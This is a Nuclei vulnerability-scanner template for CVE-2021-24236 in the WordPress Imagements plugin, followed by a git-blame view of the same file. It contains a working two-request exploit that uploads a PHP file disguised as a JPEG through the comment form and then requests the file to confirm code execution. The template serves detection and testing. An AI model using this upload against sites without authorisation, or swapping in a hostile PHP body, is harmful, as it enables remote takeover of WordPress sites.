nuclei-templates/http/cves/2021/CVE-2021-24236.yaml

id: "CVE-2021-24236"

info:
  name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.
  impact: |
    This vulnerability can lead to remote code execution and compromise the affected WordPress site.
  remediation: |
    Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability.
  reference:
    - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
    - https://wordpress.org/plugins/imagements/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24236
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: "CVE-2021-24236"
    cwe-id: CWE-434
    epss-score: 0.15028
    epss-percentile: 0.95276
    cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: imagements_project
    product: imagements
    framework: wordpress
  tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive,imagements_project
variables:
  php: "{{to_lower('{{randstr}}')}}.php"
  post: "1"

http:
  - raw:
      - |
        POST /wp-comments-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="author"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="email"

        {{randstr}}@email.com
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="url"

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="checkbox"


        yes
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="naam"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="image"; filename="{{php}}"
        Content-Type: image/jpeg

        <?php echo 'CVE-2021-24236'; ?>

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="submit"

        Post Comment
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_post_ID"

        {{post}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_parent"

        0
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--
      - |
        GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2021-24236"
# digest: 4a0a0047304502206c911be801d31b8531ac7c46a7198b59b6b9efbeddd70069927a16099406f2ee022100e1de4ada420edd138824003dc30a8ade3e03ba4af3b423ab0afe8717e989aa7e:922c64590222798bb761d5b6d8e72950
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`id: "CVE-2021-24236"`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00
			`info:`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`name: WordPress Imagements <=1.2.5 - Arbitrary File Upload`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`author: pussycat0x`
			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`This vulnerability can lead to remote code execution and compromise the affected WordPress site.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability.`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea`
Update CVE-2021-24236.yaml 2022-07-31 04:35:00 +00:00			`- https://wordpress.org/plugins/imagements/`
Update CVE-2021-24236.yaml 2022-07-30 22:42:08 +00:00			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-24236`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`classification:`
Auto Generated CVE annotations [Mon Oct 10 19:40:25 UTC 2022] :robot: 2022-10-10 19:40:25 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cve-id: "CVE-2021-24236"`
Auto Generated CVE annotations [Mon Oct 10 19:40:25 UTC 2022] :robot: 2022-10-10 19:40:25 +00:00			`cwe-id: CWE-434`
TemplateMan Update [Tue Dec 12 11:07:51 UTC 2023] :robot: 2023-12-12 11:07:52 +00:00			`epss-score: 0.15028`
			`epss-percentile: 0.95276`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:imagements_project:imagements::::::wordpress::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: imagements_project`
			`product: imagements`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`framework: wordpress`
tags enhancements 2023-12-05 09:50:33 +00:00			`tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive,imagements_project`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`variables:`
			`php: "{{to_lower('{{randstr}}')}}.php"`
			`post: "1"`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`- raw:`
			`- \|`
			`POST /wp-comments-post.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU`

			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="comment"`

			`{{randstr}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="author"`

			`{{randstr}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="email"`

			`{{randstr}}@email.com`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="url"`

			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="checkbox"`

fix-conflict 2022-10-25 13:40:49 +00:00
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`yes`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="naam"`

			`{{randstr}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="image"; filename="{{php}}"`
			`Content-Type: image/jpeg`

			`<?php echo 'CVE-2021-24236'; ?>`

			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="submit"`

			`Post Comment`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="comment_post_ID"`

			`{{post}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="comment_parent"`

			`0`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--`
			`- \|`
			`GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: word`
			`part: body_2`
			`words:`
Update CVE-2021-24236.yaml 2022-07-30 22:42:08 +00:00			`- "CVE-2021-24236"`
Auto Template Signing [Fri Dec 29 09:30:43 UTC 2023] :robot: 2023-12-29 09:30:44 +00:00			`# digest: 4a0a0047304502206c911be801d31b8531ac7c46a7198b59b6b9efbeddd70069927a16099406f2ee022100e1de4ada420edd138824003dc30a8ade3e03ba4af3b423ab0afe8717e989aa7e:922c64590222798bb761d5b6d8e72950`